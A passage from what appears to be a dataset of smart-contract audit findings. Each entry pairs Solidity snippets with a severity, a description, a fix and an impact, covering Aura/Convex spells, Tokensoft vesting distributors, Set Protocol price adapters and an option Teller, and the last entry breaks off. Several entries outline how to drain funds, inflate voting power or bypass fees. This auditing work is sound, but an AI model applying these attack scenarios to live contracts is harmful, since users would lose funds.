borrowTokenIndex\\n ) = _getExitPoolParams(param.borrowToken, lpToken);\\n\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n```\\n" +AuraSpell#closePositionFarm will take reward fees on underlying tokens when borrow token is also a reward,medium,"AuraSpell.sol#L227-L247\\n```\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n );\\n }\\n }\\n\\n /// 4. Swap each reward token for the debt token\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n address sellToken = rewardTokens[i];\\n if (sellToken == STASH_AURA) sellToken = AURA;\\n\\n _doCutRewardsFee(sellToken);\\n```\\n\\nWe can see above that closePositionFarm redeems the BLP before it takes the reward cut. This can cause serious issues. If there is any overlap between the reward tokens and the borrow token then _doCutRewardsFee will take a cut of the underlying liquidity. This causes loss to the user as too many fees are taken from them.",Use the same order as ConvexSpell and sell rewards BEFORE burning BLP,User will lose funds due to incorrect fees,"```\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n );\\n }\\n }\\n\\n /// 4. Swap each reward token for the debt token\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n address sellToken = rewardTokens[i];\\n if (sellToken == STASH_AURA) sellToken = AURA;\\n\\n _doCutRewardsFee(sellToken);\\n```\\n" +Adversary can abuse hanging approvals left by PSwapLib.swap to bypass reward fees,medium,"AuraSpell.sol#L247-L257\\n```\\n _doCutRewardsFee(sellToken);\\n if (\\n expectedRewards[i] != 0 &&\\n !PSwapLib.swap(\\n augustusSwapper,\\n tokenTransferProxy,\\n sellToken,\\n expectedRewards[i],\\n swapDatas[i]\\n )\\n ) revert Errors.SWAP_FAILED(sellToken);\\n```\\n\\nAuraSpell#closePositionFarm allows the user to specify any expectedRewards they wish. This allows the user to approve any amount, even if the amount is much larger than they would otherwise use. The can abuse these hanging approvals to swap tokens out of order and avoid paying reward fees.\\nExample: Assume there are two rewards, token A and token B. Over time a user's position accumulates 100 rewards for each token. Normally the user would have to pay fees on those rewards. However they can bypass it by first creating hanging approvals. The user would start by redeeming a very small amount of LP and setting expectedRewards to uint256.max. They wouldn't sell the small amount leaving a very large approval left for both tokens. Now the user withdraws the rest of their position. This time they specify the swap data to swap token B first. The user still has to pay fees on token A but now they have traded token B before any fees can be taken on it.",After the swap reset allowances to 0,User can bypass reward fees,"```\\n _doCutRewardsFee(sellToken);\\n if (\\n expectedRewards[i] != 0 &&\\n !PSwapLib.swap(\\n augustusSwapper,\\n tokenTransferProxy,\\n sellToken,\\n expectedRewards[i],\\n swapDatas[i]\\n )\\n ) revert Errors.SWAP_FAILED(sellToken);\\n```\\n" +ConvexSpell is completely broken for any curve LP that utilizes native ETH,medium,"ConvexSpell.sol#L120-L127\\n```\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i; i != 2; ++i) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n```\\n\\nConvexSpell#openPositionFarm attempts to call balanceOf on each component of the LP. Since native ETH uses the `0xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee` this call will always revert. This breaks compatibility with EVERY curve pool that uses native ETH which make most of the highest volume pools on the platfrom.",I would recommend conversion between native ETH and wETH to prevent this issue.,ConvexSpell is completely incompatible with a majority of Curve pools,"```\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i; i != 2; ++i) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n```\\n" +WAuraPools doesn't correctly account for AuraStash causing all deposits to be permanently lost,medium,"WAuraPools.sol#L413-L418\\n```\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n```\\n\\nWhen burning the wrapped LP token, it attempts to transfer each token to msg.sender. The problem is that stash AURA cannot be transferred like an regular ERC20 token and any transfers will revert. Since this will be called on every attempted withdraw, all deposits will be permanently unrecoverable.",Check if reward is stash AURA and send regular AURA instead similar to what is done in AuraSpell.,All deposits will be permanently unrecoverable,"```\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n```\\n" +AuraSpell `openPositionFarm` will revert when the tokens contains `lpToken`,medium,"In AuraSpell, the `openPositionFarm` will call `joinPool` in Balancer's vault. But when analyzing the `JoinPoolRequest` struct, we see issue on `maxAmountsIn` and `amountsIn` which can be in different length, thus this will be reverted since in Balancer's vault, this two array should be in the same length.\\n```\\nFile: AuraSpell.sol\\n function openPositionFarm(\\n OpenPosParam calldata param,\\n uint256 minimumBPT\\n )\\n// rest of code\\n {\\n// rest of code\\n /// 3. Add liquidity to the Balancer pool and receive BPT in return.\\n {\\n// rest of code\\n if (poolAmountOut != 0) {\\n vault.joinPool(\\n wAuraPools.getBPTPoolId(lpToken),\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n );\\n }\\n }\\n// rest of code\\n }\\n// rest of code\\n function _getJoinPoolParamsAndApprove(\\n address vault,\\n address[] memory tokens,\\n uint256[] memory balances,\\n address lpToken\\n ) internal returns (uint256[] memory, uint256[] memory, uint256) {\\n// rest of code\\n uint256 length = tokens.length;\\n uint256[] memory maxAmountsIn = new uint256[](length);\\n uint256[] memory amountsIn = new uint256[](length);\\n bool isLPIncluded;\\n for (i; i != length; ) {\\n if (tokens[i] != lpToken) {\\n amountsIn[j] = IERC20(tokens[i]).balanceOf(address(this));\\n if (amountsIn[j] > 0) {\\n _ensureApprove(tokens[i], vault, amountsIn[j]);\\n }\\n ++j;\\n } else isLPIncluded = true;\\n maxAmountsIn[i] = IERC20(tokens[i]).balanceOf(address(this));\\n unchecked {\\n ++i;\\n }\\n }\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n// rest of code\\n return (maxAmountsIn, amountsIn, poolAmountOut);\\n }\\n```\\n\\nthese `maxAmountsIn` and `amountsIn` are coming from `_getJoinPoolParamsAndApprove`. And by seeing the function, we can see that there is possible issue when the `tokens[i] == lpToken`.\\nWhen `tokens[i] == lpToken`, the flag `isLPIncluded` will be true. And will enter this block,\\n```\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n```\\n\\nthis will decrease the `amountsIn` length. Thus, `amountsIn` and `maxAmountsIn` will be in different length.\\nIn Balancer's `JoinPoolRequest` struct, the `maxAmountsIn`, and `userData` second decoded bytes (amountsIn) should be the same array length, because it will be checked in Balancer.\\n```\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n```\\n\\nTherefore, in this situation, it will be reverted.",Issue AuraSpell `openPositionFarm` will revert when the tokens contains `lpToken`\\nRemove the assembly code where it will decrease the `amountsIn` length when `isLPIncluded` is true to make sure the array length are same.,User can't open position on AuraSpell when `tokens` contains `lpToken`,"```\\nFile: AuraSpell.sol\\n function openPositionFarm(\\n OpenPosParam calldata param,\\n uint256 minimumBPT\\n )\\n// rest of code\\n {\\n// rest of code\\n /// 3. Add liquidity to the Balancer pool and receive BPT in return.\\n {\\n// rest of code\\n if (poolAmountOut != 0) {\\n vault.joinPool(\\n wAuraPools.getBPTPoolId(lpToken),\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n );\\n }\\n }\\n// rest of code\\n }\\n// rest of code\\n function _getJoinPoolParamsAndApprove(\\n address vault,\\n address[] memory tokens,\\n uint256[] memory balances,\\n address lpToken\\n ) internal returns (uint256[] memory, uint256[] memory, uint256) {\\n// rest of code\\n uint256 length = tokens.length;\\n uint256[] memory maxAmountsIn = new uint256[](length);\\n uint256[] memory amountsIn = new uint256[](length);\\n bool isLPIncluded;\\n for (i; i != length; ) {\\n if (tokens[i] != lpToken) {\\n amountsIn[j] = IERC20(tokens[i]).balanceOf(address(this));\\n if (amountsIn[j] > 0) {\\n _ensureApprove(tokens[i], vault, amountsIn[j]);\\n }\\n ++j;\\n } else isLPIncluded = true;\\n maxAmountsIn[i] = IERC20(tokens[i]).balanceOf(address(this));\\n unchecked {\\n ++i;\\n }\\n }\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n// rest of code\\n return (maxAmountsIn, amountsIn, poolAmountOut);\\n }\\n```\\n" +"""Votes"" balance can be increased indefinitely in multiple contracts",high,"The ""voting power"" can be easily manipulated in the following contracts:\\n`ContinuousVestingMerkle`\\n`PriceTierVestingMerkle`\\n`PriceTierVestingSale_2_0`\\n`TrancheVestingMerkle`\\n`CrosschainMerkleDistributor`\\n`CrosschainContinuousVestingMerkle`\\n`CrosschainTrancheVestingMerkle`\\nAll the contracts inheriting from the contracts listed above\\nThis is caused by the public `initializeDistributionRecord()` function that can be recalled multiple times without any kind of access control:\\n```\\n function initializeDistributionRecord(\\n uint32 _domain, // the domain of the beneficiary\\n address _beneficiary, // the address that will receive tokens\\n uint256 _amount, // the total claimable by this beneficiary\\n bytes32[] calldata merkleProof\\n ) external validMerkleProof(_getLeaf(_beneficiary, _amount, _domain), merkleProof) {\\n _initializeDistributionRecord(_beneficiary, _amount);\\n }\\n```\\n\\nThe `AdvancedDistributor` abstract contract which inherits from the `ERC20Votes`, `ERC20Permit` and `ERC20` contracts, distributes tokens to beneficiaries with voting-while-vesting and administrative controls. Basically, before the tokens are vested/claimed by a certain group of users, these users can use these `ERC20` tokens to vote. These tokens are minted through the `_initializeDistributionRecord()` function:\\n```\\n function _initializeDistributionRecord(\\n address beneficiary,\\n uint256 totalAmount\\n ) internal virtual override {\\n super._initializeDistributionRecord(beneficiary, totalAmount);\\n\\n // add voting power through ERC20Votes extension\\n _mint(beneficiary, tokensToVotes(totalAmount));\\n }\\n```\\n\\nAs mentioned in the Tokensoft Discord channel these ERC20 tokens minted are used to track an address's unvested token balance, so that other projects can utilize 'voting while vesting'.\\nA user can simply call as many times as he wishes the `initializeDistributionRecord()` function with a valid merkle proof. With each call, the `totalAmount` of tokens will be minted. Then, the user simply can call `delegate()` and delegate those votes to himself, ""recording"" the inflated voting power.","Only allow users to call once the `initializeDistributionRecord()` function. Consider using a mapping to store if the function was called previously or not. Keep also in mind that fully vested and claimed users should not be able to call this function and if they do, the total amount of tokens that should be minted should be 0 or proportional/related to the amount of tokens that they have already claimed.",The issue totally breaks the 'voting while vesting' design. Any DAO/project using these contracts to determine their voting power could be easily manipulated/exploited.,"```\\n function initializeDistributionRecord(\\n uint32 _domain, // the domain of the beneficiary\\n address _beneficiary, // the address that will receive tokens\\n uint256 _amount, // the total claimable by this beneficiary\\n bytes32[] calldata merkleProof\\n ) external validMerkleProof(_getLeaf(_beneficiary, _amount, _domain), merkleProof) {\\n _initializeDistributionRecord(_beneficiary, _amount);\\n }\\n```\\n" +`SafeERC20.safeApprove` reverts for changing existing approvals,medium,"`SafeERC20.safeApprove` reverts when a non-zero approval is changed to a non-zero approval. The `CrosschainDistributor._setTotal` function tries to change an existing approval to a non-zero value which will revert.\\nThe safeApprove function has explicit warning:\\n```\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n```\\n\\nBut still the `_setTotal` use it to change approval amount:\\n```\\n function _allowConnext(uint256 amount) internal {\\n token.safeApprove(address(connext), amount);\\n }\\n\\n /** Reset Connext allowance when total is updated */\\n function _setTotal(uint256 _total) internal virtual override onlyOwner {\\n super._setTotal(_total);\\n _allowConnext(total - claimed);\\n }\\n```\\n",Consider using 'safeIncreaseAllowance' and 'safeDecreaseAllowance' instead of `safeApprove` in `_setTotal`.,Due to this bug all calls to `setTotal` function of `CrosschainContinuousVestingMerkle` and `CrosschainTrancheVestingMerkle` will get reverted.\\nTokensoft airdrop protocol is meant to be used by other protocols and the ability to change `total` parameter is an intended offering. This feature will be important for those external protocols due to the different nature & requirement of every airdrop. But this feature will not be usable by airdrop owners due to the incorrect code implementation.,"```\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n```\\n" +CrosschainDistributor: Not paying relayer fee when calling xcall to claim tokens to other domains,medium,"CrosschainDistributor is not paying relayer fee when calling xcall to claim tokens to other domains. The transaction will not be relayed on target chain to finnalize the claim. User will not receive the claimed tokens unless they bump the transaction fee themself.\\nIn `_settleClaim`, the CrosschainDistributor is using xcall to claim tokens to another domain. But relayer fee is not payed.\\n```\\n id = connext.xcall( // <------ relayer fee should be payed here\\n _recipientDomain, // destination domain\\n _recipient, // to\\n address(token), // asset\\n _recipient, // delegate, only required for self-execution + slippage\\n _amount, // amount\\n 0, // slippage -- assumes no pools on connext\\n bytes('') // calldata\\n );\\n```\\n\\nWithout the relayer fee, the transaction will not be relayed. The user will need to bump the relayer fee to finnally settle the claim by following the instructions here in the connext doc.",Help user bump the transaction fee in Satellite.,User will not receive their claimed tokens on target chain.,"```\\n id = connext.xcall( // <------ relayer fee should be payed here\\n _recipientDomain, // destination domain\\n _recipient, // to\\n address(token), // asset\\n _recipient, // delegate, only required for self-execution + slippage\\n _amount, // amount\\n 0, // slippage -- assumes no pools on connext\\n bytes('') // calldata\\n );\\n```\\n" +Loss of funds during user adjusting,medium,"Adjusting a user's total claimable value not working correctly\\nWhenever the owner is adjusting user's total claimable value, the `records[beneficiary].total` is decreased or increased by `uint256 diff = uint256(amount > 0 ? amount : -amount);`.\\nHowever some assumptions made are not correct. Scenario:\\nUser has bought 200 FOO tokens for example.\\nIn `PriceTierVestingSale_2_0.sol` he calls the `initializeDistributionRecord` which sets his `records[beneficiary].total` to the purchased amount || 200. So `records[beneficiary].total` = 200\\nAfter that the owner decides to adjust his `records[beneficiary].total` to 300. So `records[beneficiary].total` = 300\\nUser decides to `claim` his claimable amount which should be equal to 300. He calls the `claim` function in `PriceTierVestingSale_2_0.sol`.\\n```\\nfunction claim(\\n address beneficiary // the address that will receive tokens\\n ) external validSaleParticipant(beneficiary) nonReentrant {\\n uint256 claimableAmount = getClaimableAmount(beneficiary);\\n uint256 purchasedAmount = getPurchasedAmount(beneficiary);\\n\\n // effects\\n uint256 claimedAmount = super._executeClaim(beneficiary, purchasedAmount);\\n\\n // interactions\\n super._settleClaim(beneficiary, claimedAmount);\\n }\\n```\\n\\nAs we can see here the `_executeClaim` is called with the `purchasedAmount` of the user which is still 200.\\n```\\nfunction _executeClaim(\\n address beneficiary,\\n uint256 _totalAmount\\n ) internal virtual returns (uint256) {\\n uint120 totalAmount = uint120(_totalAmount);\\n\\n // effects\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n _initializeDistributionRecord(beneficiary, totalAmount);\\n }\\n \\n uint120 claimableAmount = uint120(getClaimableAmount(beneficiary));\\n require(claimableAmount > 0, 'Distributor: no more tokens claimable right now');\\n\\n records[beneficiary].claimed += claimableAmount;\\n claimed += claimableAmount;\\n\\n return claimableAmount;\\n }\\n```\\n\\nNow check the `if` statement:\\n```\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n _initializeDistributionRecord(beneficiary, totalAmount);\\n }\\n```\\n\\nThe point of this is if the `total` of the user has been adjusted, to re-initialize to the corresponding amount, but since it's updated by the input value which is 200, records[beneficiary].total = 200 , the user will lose the 100 added from the owner during the `adjust`","I am not sure if it is enough to just set it the following way:\\n```\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n `--` _initializeDistributionRecord(beneficiary, totalAmount);\\n `++` _initializeDistributionRecord(beneficiary, records[beneficiary].total);\\n }\\n```\\n\\nThink of different scenarios if it is done that way and also keep in mind that the same holds for the decrease of `records[beneficiary].total` by `adjust`",Loss of funds for the user and the protocol,"```\\nfunction claim(\\n address beneficiary // the address that will receive tokens\\n ) external validSaleParticipant(beneficiary) nonReentrant {\\n uint256 claimableAmount = getClaimableAmount(beneficiary);\\n uint256 purchasedAmount = getPurchasedAmount(beneficiary);\\n\\n // effects\\n uint256 claimedAmount = super._executeClaim(beneficiary, purchasedAmount);\\n\\n // interactions\\n super._settleClaim(beneficiary, claimedAmount);\\n }\\n```\\n" +Exponential and logarithmic price adapters will return incorrect pricing when moving from higher dp token to lower dp token,medium,"The exponential and logarithmic price adapters do not work correctly when used with token pricing of different decimal places. This is because the resolution of the underlying expWad and lnWad functions is not fit for tokens that aren't 18 dp.\\nAuctionRebalanceModuleV1.sol#L856-L858\\n```\\nfunction _calculateQuoteAssetQuantity(bool isSellAuction, uint256 _componentQuantity, uint256 _componentPrice) private pure returns (uint256) {\\n return isSellAuction ? _componentQuantity.preciseMulCeil(_componentPrice) : _componentQuantity.preciseMul(_componentPrice);\\n}\\n```\\n\\nThe price returned by the adapter is used directly to call _calculateQuoteAssetQuantity which uses preciseMul/preciseMulCeil to convert from component amount to quote amount. Assume we wish to sell 1 WETH for 2,000 USDT. WETH is 18dp while USDT is 6dp giving us the following price:\\n```\\n1e18 * price / 1e18 = 2000e6\\n```\\n\\nSolving for price gives:\\n```\\nprice = 2000e6\\n```\\n\\nThis establishes that the price must be scaled to:\\n```\\nprice dp = 18 - component dp + quote dp\\n```\\n\\nPlugging in our values we see that our scaling of 6 dp makes sense.\\nBoundedStepwiseExponentialPriceAdapter.sol#L67-L80\\n```\\n uint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\n // Protect against priceChange overflow\\n if (scalingFactor > type(uint256).max / expExpression) {\\n return _getBoundaryPrice(isDecreasing, maxPrice, minPrice);\\n }\\n uint256 priceChange = scalingFactor * expExpression - WAD;\\n\\n if (isDecreasing) {\\n // Protect against price underflow\\n if (priceChange > initialPrice) {\\n return minPrice;\\n }\\n return FixedPointMathLib.max(initialPrice - priceChange , minPrice);\\n```\\n\\nGiven the pricing code and notably the simple scalingFactor it also means that priceChange must be in the same order of magnitude as the price which in this case is 6 dp. The issue is that on such small scales, both lnWad and expWad do not behave as expected and instead yield a linear behavior. This is problematic as the curve will produce unexpected behaviors under these circumstances selling the tokens at the wrong price. Since both functions are written in assembly it is very difficult to determine exactly what is going on or why this occurs but testing in remix gives the following values:\\n```\\nexpWad(1e6) - WAD = 1e6\\nexpWad(5e6) - WAD = 5e6\\nexpWad(10e6) - WAD = 10e6\\nexpWad(1000e6) - WAD = 1000e6\\n```\\n\\nAs seen above these value create a perfect linear scaling and don't exhibit any exponential qualities. Given the range of this linearity it means that these adapters can never work when selling from higher to lower dp tokens.",scalingFactor should be scaled to 18 dp then applied via preciseMul instead of simple multiplication. This allows lnWad and expWad to execute in 18 dp then be scaled down to the correct dp.,Exponential and logarithmic pricing is wrong when tokens have mismatched dp,"```\\nfunction _calculateQuoteAssetQuantity(bool isSellAuction, uint256 _componentQuantity, uint256 _componentPrice) private pure returns (uint256) {\\n return isSellAuction ? _componentQuantity.preciseMulCeil(_componentPrice) : _componentQuantity.preciseMul(_componentPrice);\\n}\\n```\\n" +SetToken can't be unlocked early.,medium,"SetToken can't be unlocked early\\nThe function unlock() is used to unlock the setToken after rebalancing, as how it is right now there are two ways to unlock the setToken.\\ncan be unlocked once the rebalance duration has elapsed\\ncan be unlocked early if all targets are met, there is excess or at-target quote asset, and raiseTargetPercentage is zero\\n```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, ""Cannot unlock early unless all targets are met and raiseTargetPercentage is zero"");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\n\\n```\\n function _canUnlockEarly(ISetToken _setToken) internal view returns (bool) {\\n RebalanceInfo storage rebalance = rebalanceInfo[_setToken];\\n return _allTargetsMet(_setToken) && _isQuoteAssetExcessOrAtTarget(_setToken) && rebalance.raiseTargetPercentage == 0;\\n }\\n```\\n\\nThe main problem occurs as the value of raiseTargetPercentage isn't reset after rebalancing. The other thing is that the function setRaiseTargetPercentage can't be used to fix this issue as it doesn't allow giving raiseTargetPercentage a zero value.\\nA setToken can use the AuctionModule to rebalance multiple times, duo to the fact that raiseTargetPercentage value isn't reset after every rebalancing. Once changed with the help of the function setRaiseTargetPercentage this value will only be non zero for every next rebalancing. A setToken can be unlocked early only if all other requirements are met and the raiseTargetPercentage equals zero.\\nThis problem prevents for a setToken to be unlocked early on the next rebalances, once the value of the variable raiseTargetPercentage is set to non zero.\\nOn every rebalance a manager should be able to keep the value of raiseTargetPercentage to zero (so the setToken can be unlocked early), or increase it at any time with the function setRaiseTargetPercentage.\\n```\\n function setRaiseTargetPercentage(\\n ISetToken _setToken,\\n uint256 _raiseTargetPercentage\\n )\\n external\\n onlyManagerAndValidSet(_setToken)\\n {\\n // Ensure the raise target percentage is greater than 0\\n require(_raiseTargetPercentage > 0, ""Target percentage must be greater than 0"");\\n\\n // Update the raise target percentage in the RebalanceInfo struct\\n rebalanceInfo[_setToken].raiseTargetPercentage = _raiseTargetPercentage;\\n\\n // Emit an event to log the updated raise target percentage\\n emit RaiseTargetPercentageUpdated(_setToken, _raiseTargetPercentage);\\n }\\n```\\n","Recommend to reset the value raiseTargetPercentage after every rebalancing.\\n```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, ""Cannot unlock early unless all targets are met and raiseTargetPercentage is zero"");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n+ rebalanceInfo[_setToken].raiseTargetPercentage = 0;\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\n","Once the value of raiseTargetPercentage is set to non zero, every next rebalancing of the setToken won't be eligible for unlocking early. As the value of raiseTargetPercentage isn't reset after every rebalance and neither the manager can set it back to zero with the function setRaiseTargetPercentage().","```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, ""Cannot unlock early unless all targets are met and raiseTargetPercentage is zero"");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\n" +price is calculated wrongly in BoundedStepwiseExponentialPriceAdapter,medium,"The BoundedStepwiseExponentialPriceAdapter contract is trying to implement price change as `scalingFactor * (e^x - 1)` but the code implements `scalingFactor * e^x - 1`. Since there are no brackets, multiplication would be executed before subtraction. And this has been confirmed with one of the team members.\\nThe getPrice code has been simplified as the following when boundary/edge cases are ignored\\n```\\n(\\n uint256 initialPrice,\\n uint256 scalingFactor,\\n uint256 timeCoefficient,\\n uint256 bucketSize,\\n bool isDecreasing,\\n uint256 maxPrice,\\n uint256 minPrice\\n) = getDecodedData(_priceAdapterConfigData);\\n\\nuint256 timeBucket = _timeElapsed / bucketSize;\\n\\nint256 expArgument = int256(timeCoefficient * timeBucket);\\n\\nuint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\nuint256 priceChange = scalingFactor * expExpression - WAD;\\n```\\n\\nWhen timeBucket is 0, we want priceChange to be 0, so that the returned price would be the initial price. Since `e^0 = 1`, we need to subtract 1 (in WAD) from the `expExpression`.\\nHowever, with the incorrect implementation, the returned price would be different than real price by a value equal to `scalingFactor - 1`. The image below shows the difference between the right and wrong formula when initialPrice is 100 and scalingFactor is 11. The right formula starts at 100 while the wrong one starts at 110=100+11-1\\n",Change the following line\\n```\\n- uint256 priceChange = scalingFactor * expExpression - WAD;\\n+ uint256 priceChange = scalingFactor * (expExpression - WAD);\\n```\\n,Incorrect price is returned from BoundedStepwiseExponentialPriceAdapter and that will have devastating effects on rebalance.,"```\\n(\\n uint256 initialPrice,\\n uint256 scalingFactor,\\n uint256 timeCoefficient,\\n uint256 bucketSize,\\n bool isDecreasing,\\n uint256 maxPrice,\\n uint256 minPrice\\n) = getDecodedData(_priceAdapterConfigData);\\n\\nuint256 timeBucket = _timeElapsed / bucketSize;\\n\\nint256 expArgument = int256(timeCoefficient * timeBucket);\\n\\nuint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\nuint256 priceChange = scalingFactor * expExpression - WAD;\\n```\\n" +Full inventory asset purchases can be DOS'd via frontrunning,medium,"Users who attempt to swap the entire component value can be frontrun with a very small bid making their transaction revert\\nAuctionRebalanceModuleV1.sol#L795-L796\\n```\\n // Ensure that the component quantity in the bid does not exceed the available auction quantity.\\n require(_componentQuantity <= bidInfo.auctionQuantity, ""Bid size exceeds auction quantity"");\\n```\\n\\nWhen creating a bid, it enforces the above requirement. This prevents users from buying more than they should but it is also a source of an easy DOS attack. Assume a user is trying to buy the entire balance of a component, a malicious user can frontrun them buying only a tiny amount. Since they requested the entire balance, the call with fail. This is a useful technique if an attacker wants to DOS other buyers to pass the time and get a better price from the dutch auction.",Allow users to specify type(uint256.max) to swap the entire available balance,Malicious user can DOS legitimate users attempting to purchase the entire amount of component,"```\\n // Ensure that the component quantity in the bid does not exceed the available auction quantity.\\n require(_componentQuantity <= bidInfo.auctionQuantity, ""Bid size exceeds auction quantity"");\\n```\\n" +All fund from Teller contract can be drained because a malicious receiver can call reclaim repeatedly,high,"All fund from Teller contract can be drained because a malicious receiver can call reclaim repeatedly\\nWhen mint an option token, the user is required to transfer the payout token for a call option or quote token for a put option\\nif after the expiration, the receiver can call reclaim to claim the payout token if the option type is call or claim the quote token if the option type is put\\nhowever, the root cause is when reclaim the token, the corresponding option is not burnt (code)\\n```\\n // Revert if caller is not receiver\\n if (msg.sender != receiver) revert Teller_NotAuthorized();\\n\\n // Transfer remaining collateral to receiver\\n uint256 amount = optionToken.totalSupply();\\n if (call) {\\n payoutToken.safeTransfer(receiver, amount);\\n } else {\\n // Calculate amount of quote tokens equivalent to amount at strike price\\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n quoteToken.safeTransfer(receiver, quoteAmount);\\n }\\n```\\n\\nthe Teller contract is likely to hold fund from multiple option token\\na malicious actor can create call Teller#deploy and set a receiver address that can control by himself\\nand then wait for the option expiry and repeated call reclaim to steal the fund from the Teller contract",Burn the corresponding option burn when reclaim the fund,All fund from Teller contract can be drained because a malicious receiver can call reclaim repeatedly,"```\\n // Revert if caller is not receiver\\n if (msg.sender != receiver) revert Teller_NotAuthorized();\\n\\n // Transfer remaining collateral to receiver\\n uint256 amount = optionToken.totalSupply();\\n if (call) {\\n payoutToken.safeTransfer(receiver, amount);\\n } else {\\n // Calculate amount of quote tokens equivalent to amount at strike price\\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n quoteToken.safeTransfer(receiver, quoteAmount);\\n }\\n```\\n" +All funds can be stolen from FixedStrikeOptionTeller using a token with malicious decimals,high,"`FixedStrikeOptionTeller` is a single contract which deploys multiple option tokens. Hence this single contract holds significant payout/quote tokens as collateral. Also the `deploy`, `create` & `exercise` functions of this contract can be called by anyone.\\nThis mechanism can be exploited to drain `FixedStrikeOptionTeller` of all tokens.\\nThis is how the create functions looks like:\\n```\\n function create(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n if (call) {\\n // rest of code\\n } else {\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n // rest of code\\n quoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n // rest of code\\n 